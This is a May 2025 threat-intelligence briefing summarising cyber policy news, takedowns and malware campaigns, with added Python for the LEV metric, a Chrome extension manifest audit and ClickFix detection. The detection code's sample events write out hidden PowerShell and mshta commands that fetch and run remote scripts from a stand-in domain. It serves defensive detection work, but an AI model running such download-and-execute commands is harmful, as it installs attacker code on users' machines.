Monthly Threat Briefing
Diamond Trail

Cyware Monthly Threat Intelligence, May 2025


The Good

Governments and institutions worldwide are stepping up efforts to strengthen cyber resilience through innovation and collaboration. NIST has introduced a new metric—Likely Exploited Vulnerabilities (LEV)—to enhance vulnerability risk assessments by offering detailed exploitation data alongside EPSS scores. In the U.K., the Ministry of Defence has launched a Cyber and Electromagnetic Command backed by a £1 billion investment to bolster digital warfare capabilities. Meanwhile, cybersecurity agencies from the U.S., U.K., Australia, Canada, and others have issued a joint advisory promoting the adoption of SIEM and SOAR platforms to improve threat detection, streamline response, and address operational challenges.

  • NIST introduced a new metric called Likely Exploited Vulnerabilities (LEV) to estimate the probability that a vulnerability has already been exploited, complementing the forward-looking Exploit Prediction Scoring System (EPSS). LEV output gives vulnerability managers the CVE name, publish date, description, probability of past exploitation, peak EPSS score, and affected products. Two versions of the LEV equation are presented: one that steps through EPSS scores in 30-day windows, and one that divides each day's EPSS score to approximate a single-day probability, which tracks score changes more closely but requires more computation.

  • The U.K. Ministry of Defence has established a new Cyber and Electromagnetic Command, backed by a £1 billion investment to enhance digital warfare capabilities. This command will defend military networks and coordinate offensive operations with the National Cyber Force. A key initiative is the development of a Digital Targeting Web, aimed at connecting weapons systems through AI for improved communication and rapid response. The move responds to rising cyber threats, with the U.K. having experienced 90,000 cyber-attacks in the past two years, prompting accelerated recruitment of cybersecurity specialists.

  • Governments in the U.S., the U.K., Australia, Canada, and others have issued a joint advisory urging organizations to adopt SIEM and SOAR platforms. These systems centralize cybersecurity data for effective incident detection and response. The advisory provides guidance for both executives and practitioners, addressing challenges like alert fatigue and significant implementation costs. Organizations managing sensitive data should consider in-house deployment, while those outsourcing must carefully evaluate service providers, particularly regarding hidden costs related to data ingestion.

  • A major Europol-coordinated operation, part of Operation Endgame, dismantled initial access malware used in ransomware attacks, targeting strains like Bumblebee, DanaBot, QakBot, and TrickBot. Authorities seized 300 servers, 650 domains, and €3.5 million ($3.9 million) in cryptocurrency, issuing international arrest warrants for 20 individuals involved in ransomware operations. U.S. authorities issued federal indictments against individuals linked to QakBot and DanaBot malware, including 16 Russians and a lead developer from Moscow. 

  • Microsoft, alongside global law enforcement and cybersecurity partners, has dismantled the Lumma Stealer network, responsible for widespread credential theft, financial fraud, and ransomware attacks. Over 2,300 domains linked to nearly 400,000 infections were seized, disrupting the malware's operations. Legal actions included redirecting malicious domains to Microsoft-controlled servers for intelligence gathering.

  • Smart heat pumps in the U.K. are now subject to new cybersecurity rules under the Smart Secure Electricity Systems Programme. These rules require compliance with the ETSI EN 303 645 standard, ensuring better protection for consumers, their data, and the national grid. The regulations apply to heat pumps with a capacity of up to 45 kW and aim to address risks such as cyberattacks and grid instability. Manufacturers must prepare for these changes by adopting secure-by-design practices and ensuring their devices meet the required standards before enforcement begins in late 2026 or early 2027.

  • The EU has launched She@Cyber, a free beginner cybersecurity training program targeting women and underrepresented groups to address the cyber skills gap. The program, supported by Erasmus+ and coordinated by Vernian RTI, offers industry-recognized credentials based on ISACA’s Cybersecurity Fundamentals Certificate. SMEs, startups, and microenterprises are encouraged to use the program to find cybersecurity talent.

  • Europol has successfully dismantled six DDoS-for-hire services used globally for cyberattacks. The operation involved arrests in Poland, seizure of domains in the U.S., and collaboration with Dutch and German authorities as part of Operation PowerOFF. These services, disguised as stress-testing tools, allowed non-technical users to launch DDoS attacks by renting infrastructure. 

  • The UN has introduced the UNIDIR Intrusion Path framework to assess cyber-attacks, complementing existing models like the MITRE ATT&CK framework. The framework simplifies technical language, aiming to help policymakers and non-technical stakeholders better understand malicious IT activities and promote informed cyber diplomacy. It categorizes activities across three network layers: outside the perimeter (external systems like the dark web), on the perimeter (boundary systems like firewalls), and inside the perimeter (internal networks with sensitive data).

  • The PIVOTT Act (Providing Individuals Various Opportunities for Technical Training to Build a Skills-Based Cyber Workforce Act of 2025) was reintroduced to address the cybersecurity workforce gap, offering scholarships for two-year degrees in exchange for government service. The Act targets entry-level talent and career changers, aiming to prepare professionals for government service, including roles requiring high security clearance.

  • The FBI has published details of 42,000 phishing domains linked to the LabHost phishing-as-a-service operation, which was used by around 10,000 cybercriminals and resulted in significant fraud losses. The domains are released to aid network defenders in building cyber resilience and investigating past breaches. LabHost facilitated the theft of data on 500,000 credit cards and over one million passwords. Organizations are urged to investigate any unusual network activity related to these domains and take preventive measures.
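The LEV item above describes the metric in words only. As an added worked example, not code from NIST or from this briefing, the following Python implements both forms of the LEV calculation over a constructed EPSS history for a hypothetical CVE. The 30-day window form and the per-day form follow the briefing's description; the weighting of a trailing partial window by the fraction of 30 days it covers is my reading of the NIST paper and should be checked against the published equation before use. The EPSS values and dates are constructed, not real feed data.

```python
from datetime import date, timedelta

# Constructed EPSS history for a hypothetical CVE (not real data). Each entry is
# the EPSS score published on that day; a real run would read the daily EPSS
# CSV feed for the CVE in question.
SAMPLE_EPSS = {
    date(2025, 1, 1): 0.10,
    date(2025, 1, 31): 0.40,
    date(2025, 3, 2): 0.05,
}
WINDOW = 30  # EPSS predicts exploitation within the next 30 days


def epss_on(history, day):
    """EPSS score in effect on `day`: the most recent published score on or before it."""
    dated = [d for d in history if d <= day]
    return history[max(dated)] if dated else 0.0


def lev_windowed(history, d0, dn):
    """LEV form 1: step through [d0, dn) in 30-day windows.
    Each window contributes its EPSS score as the probability of exploitation in
    that window; a final partial window is weighted by the fraction of 30 days it
    covers (assumed weighting, see lead-in). Returns P(exploited at least once)."""
    p_none = 1.0  # probability that no window saw exploitation
    di = d0
    while di < dn:
        days_left = (dn - di).days
        weight = min(days_left, WINDOW) / WINDOW
        p_none *= 1.0 - epss_on(history, di) * weight
        di += timedelta(days=WINDOW)
    return 1.0 - p_none


def lev_daily(history, d0, dn):
    """LEV form 2: treat epss/30 as a per-day probability and multiply over every
    day in [d0, dn). Follows score changes within a window, at ~30x the work."""
    p_none = 1.0
    for offset in range((dn - d0).days):
        day = d0 + timedelta(days=offset)
        p_none *= 1.0 - epss_on(history, day) / WINDOW
    return 1.0 - p_none


def lev_summary(history, d0, dn):
    """The fields a vulnerability manager would want next to the CVE record."""
    return {
        "windowed": round(lev_windowed(history, d0, dn), 4),
        "daily": round(lev_daily(history, d0, dn), 4),
        "peak_epss": max(history.values()) if history else 0.0,
    }


if __name__ == "__main__":
    print(lev_summary(SAMPLE_EPSS, date(2025, 1, 1), date(2025, 3, 31)))
```

For the constructed history the windowed form gives about 0.49 and the daily form about 0.42; the daily form is always at or below the windowed one for a constant score, because spreading a 30-day probability over 30 independent days compounds to slightly less than the single window value.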

The Bad

A wave of sophisticated cyberattacks continues to target high-profile individuals and organizations, using advanced social engineering and stealthy malware delivery methods. Trellix uncovered a highly targeted spear-phishing campaign impersonating Rothschild & Co recruiters to lure CFOs and finance executives across multiple regions. Another campaign is leveraging fake job offers from fashion and beauty brands to distribute the PureHVNC RAT through a complex infection chain. Meanwhile, Russian threat group Void Blizzard has escalated its attacks on over 20 NGOs in Europe and the U.S., using Evilginx phishing pages, malicious QR codes, and spoofed Microsoft Entra portals.

  • Trellix discovered a highly targeted spear-phishing operation aimed at CFOs and finance executives in banks, energy companies, insurers, and investment firms across Europe, Africa, Canada, the Middle East, and South Asia. The attackers abused NetBird, an open-source remote-access tool, without exploiting any flaws in the software itself. The phishing emails impersonated Rothschild & Co recruiters, offering fake financial leadership opportunities to lure victims. The phishing link redirects victims to a Firebase-hosted webpage with a custom CAPTCHA, which decrypts a secondary link upon solving the puzzle. The second-stage VBS script installs NetBird and OpenSSH silently, sets up persistence, and removes visible traces of compromise.

  • The PureHVNC RAT is being distributed through a complex multi-layer infection chain that uses fake high-level job offers from fashion and beauty brands as lures. The attack begins with a malicious LNK file disguised as a PDF, executing PowerShell commands to deliver the malware. Techniques such as obfuscation, base64 encoding, and Process Hollowing are employed to evade detection. The final payload, a .NET-based PureHVNC RAT, provides attackers with full system access. Multiple C2 addresses and campaign IDs are utilized to manage infections, indicating a sophisticated and targeted approach.

  • Dark Partners, a cybercrime group, has been conducting large-scale cryptocurrency thefts by using fake websites that mimic popular AI, VPN, and crypto tools. These sites deliver malware like Poseidon Stealer (macOS) and Lumma Stealer (Windows) to steal sensitive data, including cryptocurrency wallet information. The group uses anti-sandbox modules, obfuscation, and advanced techniques like retrieving C2 server addresses via Google Calendar links. The malware can exfiltrate data from 76 wallets and desktop applications, with fake download pages designed to target specific operating systems.

  • A Vietnamese-linked hacking group, UNC6032, has been distributing malware via fake AI video generator websites since mid-2024, using social media ads to lure victims. The campaign involves fake websites mimicking legitimate AI tools like Luma AI and Canva Dream Lab, which deliver malware payloads such as STARKVEIL, XWORM, and FROSTRIFT. Over 30 fake websites have been identified, with ads reaching millions of users primarily on Facebook and LinkedIn. The malicious ads target users globally, rotating domains frequently to avoid detection. The malware payloads are modular and include mechanisms to ensure persistence even if some components are detected or blocked.

  • Russian hackers, identified as Void Blizzard, have breached over 20 NGOs in Europe and the U.S. using Evilginx phishing via fake Microsoft Entra pages. Active since April 2024, they target organizations linked to Russian government interests, employing stolen credentials purchased from online marketplaces. Their tactics include password spraying, spear-phishing emails, and utilizing tools like AzureHound for reconnaissance. In April 2025, Void Blizzard began using spear phishing campaigns involving fake emails and malicious QR codes to steal login credentials, including spoofing Microsoft Entra authentication portals. Recent attacks involved phishing emails impersonating the European Defense and Security Summit, leading to significant data theft from compromised organizations, including access to Microsoft Teams conversations. The group’s activities overlap with other Russian-affiliated actors, such as Forest Blizzard and Seashell Blizzard, indicating shared intelligence objectives.

  • Cybercriminals impersonated Kling AI, a popular AI media generation platform, through fake Facebook ads and websites to distribute malware. The malicious campaign uses filename masquerading, where files appear as media files but are actually executables. The malware employs .NET Native AOT compilation to complicate analysis and evade traditional detection methods. The infection chain begins with social media malvertising, directing users to spoofed Kling AI websites. The fake websites prompt users to upload images or generate media, delivering disguised executables in zip archives. The second-stage payload, PureHVNC RAT, includes extensive stealing capabilities targeting browser extensions and cryptocurrency wallets. Vietnamese threat actors are suspected due to references in the code and other indicators like language and phone numbers.

  • A campaign has been discovered involving over 100 malicious Chrome extensions that impersonate legitimate tools like VPNs and YouTube to steal browser cookies and execute remote scripts. These extensions, promoted through fake domains, request risky permissions to hijack accounts and modify network traffic. Despite Google's removal of many extensions, some remain accessible, posing significant threats to users. The malicious extensions can retrieve and send cookies to remote servers, enabling attackers to breach corporate networks and access sensitive information.

  • Threat actors have distributed a trojanized version of the KeePass password manager, called KeeLoader, to install Cobalt Strike beacons, steal credentials, and deploy ransomware. The malicious KeePass installer was promoted via Bing advertisements and fake software sites, utilizing modified open-source code. KeeLoader includes functionality to export KeePass database data (including credentials) in cleartext, which is then stolen. Cobalt Strike watermarks in this campaign are linked to an Initial Access Broker associated with Black Basta ransomware attacks. The activity is attributed to UNC4696, a threat actor group previously linked to Nitrogen Loader campaigns and BlackCat/ALPHV ransomware.

  • The DBatLoader (ModiLoader) malware is being distributed via phishing emails impersonating a Turkish bank, prompting users to open malicious attachments containing BAT files. DBatLoader executes SnakeKeylogger, a .NET-based malware that exfiltrates data through emails, FTP, SMTP, or Telegram. The malware uses obfuscated and decrypted BAT scripts, DLL side-loading, and disguised file names to evade detection and execute malicious activities. It manipulates legitimate processes (e.g., easinvoker.exe, powershell.exe) and tools (cmd.exe, extrac32.exe, etc.) for malicious purposes like bypassing Windows Defender and injecting SnakeKeylogger. 

  • ESET researchers have uncovered Operation RoundPress, a cyberespionage campaign attributed to the Sednit group (aka Fancy Bear, APT28), targeting webmail servers via XSS vulnerabilities. The campaign expanded from targeting Roundcube in 2023 to include Horde, MDaemon, and Zimbra in 2024. Sednit used a zero-day XSS vulnerability (CVE-2024-11182) in MDaemon, which was patched in version 24.5.1. The primary targets are governmental entities and defense companies in Eastern Europe, with additional victims in Africa, Europe, and South America. The attack chain begins with spearphishing emails that exploit XSS vulnerabilities to execute malicious JavaScript payloads. SpyPress payloads (e.g., SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) are used for credential theft, email exfiltration, and bypassing security measures like 2FA. 
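The Chrome extension item above says the malicious extensions "request risky permissions" to steal cookies and modify traffic. The concrete check a defender can run is a manifest audit. The following Python is an added example, not code from the report or from Google: it reads extension manifests (MV2 or MV3), flags the permission combinations that give an extension cookie access and traffic rewriting on every site, a content security policy that admits remote or eval'd script, and an update URL outside the Chrome Web Store. The two manifests embedded below are constructed for the demo; the extension names and domains are hypothetical.

```python
import json
from pathlib import Path

# Host patterns that grant access to every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# API permissions that let an extension read session state, rewrite traffic,
# or run code it did not ship with. Descriptions are this example's wording.
SENSITIVE = {
    "cookies": "read and rewrite cookies on every host it can access",
    "webRequest": "observe every request",
    "webRequestBlocking": "modify or block requests in flight (MV2)",
    "declarativeNetRequest": "redirect or rewrite requests by rule (MV3)",
    "declarativeNetRequestWithHostAccess": "rewrite requests on granted hosts",
    "proxy": "route all browser traffic through a proxy of its choosing",
    "scripting": "inject script into pages",
    "debugger": "attach the DevTools protocol to tabs (full page control)",
    "nativeMessaging": "talk to a native host process",
    "management": "enumerate or disable other extensions",
}
TRAFFIC = {"webRequestBlocking", "declarativeNetRequest",
           "declarativeNetRequestWithHostAccess", "proxy"}
WEBSTORE_UPDATE = "https://clients2.google.com/service/update2/crx"


def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable findings for one extension manifest (MV2 or MV3)."""
    perms = set(manifest.get("permissions", []))
    perms |= set(manifest.get("optional_permissions", []))
    hosts = set(manifest.get("host_permissions", []))
    # MV2 mixes host patterns into "permissions"; content scripts add more hosts.
    hosts |= {p for p in perms if "://" in p or p == "<all_urls>"}
    for cs in manifest.get("content_scripts", []):
        hosts |= set(cs.get("matches", []))
    broad = bool(hosts & BROAD_HOSTS)

    findings = []
    if broad:
        findings.append("broad host access: " + ", ".join(sorted(hosts & BROAD_HOSTS)))
    for p in sorted(perms & set(SENSITIVE)):
        findings.append(f"permission {p}: {SENSITIVE[p]}")
    if "cookies" in perms and broad:
        findings.append("HIGH: cookies + broad host access = session theft capability")
    if perms & TRAFFIC and broad:
        findings.append("HIGH: can rewrite traffic on every site")
    csp = manifest.get("content_security_policy", "")
    if isinstance(csp, dict):  # MV3 form is an object keyed by context
        csp = csp.get("extension_pages", "")
    if "http://" in csp or "https://" in csp or "'unsafe-eval'" in csp:
        findings.append("CSP permits remote or eval'd script: " + csp)
    update_url = manifest.get("update_url")
    if update_url and update_url != WEBSTORE_UPDATE:
        findings.append("update_url is not the Chrome Web Store: " + update_url)
    return findings


def audit_profile(extensions_root) -> dict[str, list[str]]:
    """Walk a Chrome profile's Extensions/<id>/<version>/manifest.json tree."""
    report = {}
    for mf in Path(extensions_root).glob("*/*/manifest.json"):
        ext_id = mf.parent.parent.name
        report[ext_id] = audit_manifest(json.loads(mf.read_text(encoding="utf-8-sig")))
    return report


# Constructed manifests for the demo (hypothetical names and domains, not real extensions).
BENIGN = {
    "manifest_version": 3, "name": "Tab Counter", "version": "1.0",
    "permissions": ["storage"],
    "action": {"default_popup": "popup.html"},
}
SUSPECT = {
    "manifest_version": 2, "name": "Free VPN Pro", "version": "4.2",
    "permissions": ["cookies", "tabs", "webRequest", "webRequestBlocking", "proxy", "<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
    "content_security_policy": "script-src 'self' https://cdn.freevpn-pro.example 'unsafe-eval'; object-src 'self'",
    "update_url": "https://update.freevpn-pro.example/updates.xml",
}

if __name__ == "__main__":
    for name, m in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, *audit_manifest(m), sep="\n  ")
```

Point audit_profile at a user's Chrome profile Extensions directory to get findings per extension ID; the ID can then be checked against the Web Store and against any block list the organization maintains. A legitimate VPN or ad blocker will also trip the traffic rule, so the findings are for triage, not automatic removal.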

New Threats

Cybercriminals continue to innovate with new malware strains and delivery techniques designed to bypass detection and maximize data theft. A newly discovered Rust-based infostealer, dubbed EDDIESTEALER, is spreading via fake CAPTCHA verification pages, using obfuscated PowerShell scripts and advanced Rust features. Meanwhile, the Interlock ransomware gang has introduced NodeSnake, a stealthy RAT targeting universities through phishing emails and obfuscated scripts. Additionally, a new campaign is deploying the Remcos RAT using PowerShell-based loaders, malicious LNK files, and mshta.exe to deliver memory-resident malware with capabilities like keylogging, webcam access, and browser credential theft. 

  • A new Rust-based infostealer called EDDIESTEALER has been identified, spreading through fake CAPTCHA verification pages to deceive users into executing malicious PowerShell scripts. The malware uses advanced Rust features, such as memory safety and compiler optimizations, to evade detection and enhance stealth. EDDIESTEALER’s attack chain involves downloading malicious JavaScript and executable files via fake CAPTCHA prompts, targeting sensitive data like credentials, browser information, and cryptocurrency wallets. The malware employs sophisticated obfuscation techniques, including XOR-encrypted strings, custom WinAPI resolution, and self-deletion mechanisms to avoid analysis and detection.

  • The Interlock ransomware gang has deployed a new RAT named NodeSnake, targeting universities for persistent access to networks. NodeSnake is delivered via phishing emails and utilizes PowerShell or CMD scripts for persistence, creating a deceptive Registry entry. The malware features heavy code obfuscation, randomization of filenames, and cycles through C2 addresses. Once installed, it collects metadata about the user and system, exfiltrating data to the C2, while also allowing the execution of commands and loading additional payloads.

  • A phishing campaign targeting central and eastern Europe uses copyright infringement lures to distribute Rhadamanthys Stealer. Threat actors exploit DLL side-loading techniques by hijacking the execution flow of a legitimate PDF reader, delivering malicious payloads through emails that impersonate legal departments. These emails accuse recipients of copyright violations, leading to downloads from services like Mediafire. The malware establishes persistence via Windows Registry Run keys and exfiltrates sensitive information. The campaign primarily targets multimedia professionals, leveraging localized language to enhance credibility and engagement.

  • The Defendnot tool disables Microsoft Defender by spoofing antivirus registration using an undocumented Windows Security Center API. It bypasses system safeguards by injecting its DLL into a trusted process (Taskmgr.exe), allowing it to register a fake antivirus product. Once registered, Microsoft Defender shuts down, leaving the device without active protection. The tool includes configuration options and creates persistence via Windows Task Scheduler.

  • A new malware campaign utilizes a PowerShell-based loader to deploy the Remcos RAT, employing malicious LNK files and mshta.exe for execution. Delivered via malicious LNK files in ZIP archives, the attack utilizes mshta.exe to run obfuscated VBScript, bypassing Windows Defender. The malware modifies the Windows Registry for persistence, downloads multiple payloads, and executes code directly in memory using Win32 APIs. Remcos features modules for keylogging, webcam access, and credential theft from browsers, employing anti-analysis techniques to evade detection. The latest version includes enhanced functionalities for managing victim machines.

  • WaterPlum, a North Korea-linked attack group, has been using the OtterCookie malware to target financial institutions and cryptocurrency operators globally. Since its introduction in September 2024, OtterCookie has evolved through multiple versions, with v3 featuring file upload capabilities and Windows support, while v4 adds stealer modules for credentials from Google Chrome, MetaMask, and Brave browser. Differences in coding suggest varying developers for these modules. The group’s activities have been notably observed in Japan, with ongoing updates to the malware.

  • Chihuahua Stealer is a .NET-based infostealer identified through a deceptive PowerShell script shared via Google Drive. The malware employs a multi-stage payload chain, achieving persistence through scheduled tasks and targeting browser data and crypto wallet extensions. Stolen data is compressed into a ".chihuahua" archive and encrypted using AES-GCM, then exfiltrated over HTTPS while erasing local traces. Its techniques include Base64 encoding, hex-string obfuscation, and dynamic payload retrieval from fallback domains, demonstrating a sophisticated approach to evade detection.

  • Threat actors are leveraging fake AI tools on Facebook to distribute the Noodlophile malware, targeting over 62,000 users. These tools masquerade as legitimate AI-powered content creation services, tricking users into downloading malicious files. The malware harvests sensitive data, including browser credentials and cryptocurrency information, through a complex infection chain initiated by a deceptive executable.

  • Russian hackers linked to the COLDRIVER group are deploying a new malware called LOSTKEYS, targeting advisors, journalists, and NGOs, particularly those connected to Ukraine. LOSTKEYS is designed to steal files, system information, and running processes, marking an evolution in COLDRIVER's toolset. The group is also known for credential phishing and hack-and-leak campaigns. The malware is delivered through a multi-stage infection chain starting with a fake CAPTCHA page, known as ClickFix, that socially engineers users into executing PowerShell commands.

  • The Agenda ransomware group has incorporated SmokeLoader malware and a new loader, NETXLOADER, into its arsenal. NETXLOADER is a highly obfuscated .NET-based loader that deploys additional malware payloads, including Agenda ransomware and SmokeLoader, through advanced techniques like JIT hooking and AES decryption. SmokeLoader incorporates anti-analysis methods and injects payloads into processes like explorer.exe. Agenda ransomware is delivered using reflective DLL loading, allowing it to execute in memory without being written to disk.

  • The CoGUI phishing kit is actively targeting Japanese organizations, impersonating well-known consumer and finance brands to steal credentials and payment data. CoGUI employs advanced evasion techniques like geofencing, browser fingerprinting, and header fencing to avoid detection, selectively targeting specific regions. High-volume campaigns have been observed, with the majority targeting Japan, and impersonating brands like Amazon, Rakuten, PayPay, and financial institutions. Campaigns often use urgency-based lures and URLs leading to credential phishing pages, stealing usernames, passwords, and payment information.

  • Arctic Wolf Labs has identified a new campaign by the financially motivated threat group Venom Spider targeting corporate HR departments via spear-phishing emails. The campaign uses fake resumes to deliver a backdoor malware called More_eggs, which has been enhanced with new features for evasion and effectiveness. The malware uses advanced techniques like server-side polymorphism, code obfuscation, and encrypted payloads to evade detection and analysis. The More_eggs_Dropper library generates polymorphic JavaScript payloads and uses time-delayed execution to avoid sandboxing.

  • Unit 42 has identified Gremlin Stealer, a new info-stealer written in C# and advertised on Telegram since March. It targets sensitive data, including browser cookies, credit card information, cryptocurrency wallets, and credentials from FTP and VPN services. The malware bypasses Chrome's cookie protection and uploads stolen data to a server at 207.244.199[.]46. Gremlin Stealer is actively developed and capable of exfiltrating data from various applications, including Telegram and Discord.

  • Earth Kasha, an APT group believed to be part of APT10, has launched a new spear-phishing campaign targeting Taiwan and Japan in March. The campaign aims to deliver a new version of the ANEL backdoor for espionage, potentially leading to information theft and compromising sensitive data. The campaign uses a malicious Excel file, ROAMINGMOUSE, to drop ANEL components, and employs SharpHide for persistence. The second-stage backdoor, NOOPDOOR, utilizes DNS over HTTPS for secure IP resolution.
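Two items in this section (EDDIESTEALER and COLDRIVER's LOSTKEYS) describe the same delivery pattern: a fake CAPTCHA page, often called ClickFix, that talks the user into pasting a PowerShell command into the Windows Run box. The telemetry signature of that step is a script interpreter or mshta.exe spawned directly by explorer.exe with a command line that fetches and executes remote content, frequently with a hidden window or a base64-encoded command. The Python below is an added detection example, not code from either vendor report: it triages constructed process-creation events (the field names and the captcha-verify.example domain are assumptions for the demo) and decodes -EncodedCommand payloads so the indicators are matched against the decoded text as well.

```python
import base64
import ntpath
import re

# Interpreters and download helpers a ClickFix paste invokes from the Run box.
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "msiexec.exe"}

# (regex over the command line, reason string)
INDICATORS = [
    (re.compile(r"(?i)(?:^|\s)-(?:w|win|window|windowstyle)\s+h(?:idden)?\b"), "hidden window"),
    (re.compile(r"(?i)\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|"
                r"downloadfile|start-bitstransfer)\b"), "downloads remote content"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), "executes downloaded text"),
    (re.compile(r"(?i)\bmshta(?:\.exe)?\s+[\"']?https?://"), "mshta fetching remote HTA"),
    (re.compile(r"(?i)https?://\S+"), "contains URL"),
]
STRONG = {"downloads remote content", "executes downloaded text",
          "mshta fetching remote HTA", "base64-encoded command"}
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str):
    """Decoded -EncodedCommand payload (PowerShell encodes it as UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_event(ev: dict) -> list[str]:
    """Reasons this process-creation event looks like a ClickFix paste, or [] if not.
    Win+R launches the child under explorer.exe, so the parent is the anchor; a paste
    into an already-open terminal would need a different parent check."""
    parent = ntpath.basename(ev["parent_image"]).lower()
    image = ntpath.basename(ev["image"]).lower()
    if parent != "explorer.exe" or image not in LOLBINS:
        return []
    text = ev["command_line"]
    reasons = []
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("base64-encoded command")
        text = f"{text} {decoded}"  # scan the decoded payload too
    reasons += [why for rx, why in INDICATORS if rx.search(text)]
    # A lone URL or hidden window is too noisy; require a strong signal plus one more.
    if len(reasons) >= 2 and STRONG & set(reasons):
        return reasons
    return []


def triage(events) -> list[tuple[int, list[str]]]:
    return [(i, r) for i, ev in enumerate(events) if (r := triage_event(ev))]


# Constructed sample events (Sysmon/4688-style fields); the domain is hypothetical.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode(
    "irm https://captcha-verify.example/r.ps1 | iex".encode("utf-16le")).decode()
EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": 'powershell.exe -w hidden -c "iwr http://captcha-verify.example/v.txt | iex"'},
    {"parent_image": r"C:\Windows\explorer.exe", "image": _PS,
     "command_line": f"powershell.exe -NoP -W Hidden -Enc {_ENC}"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://captcha-verify.example/ok.hta"},
    {"parent_image": r"C:\Windows\System32\services.exe", "image": _PS,
     "command_line": 'powershell.exe -w hidden -c "iwr http://intranet.example/agent.ps1 | iex"'},
]

if __name__ == "__main__":
    for idx, reasons in triage(EVENTS):
        print(idx, EVENTS[idx]["command_line"][:60], reasons)
```

The first event (an admin running a script) and the last (the same download pattern, but launched by a service rather than the user's shell) are deliberately left out of the hits; the remaining three are the pasted-command shapes. On the endpoint, the Run box history in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU is a corroborating artifact for any hit.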
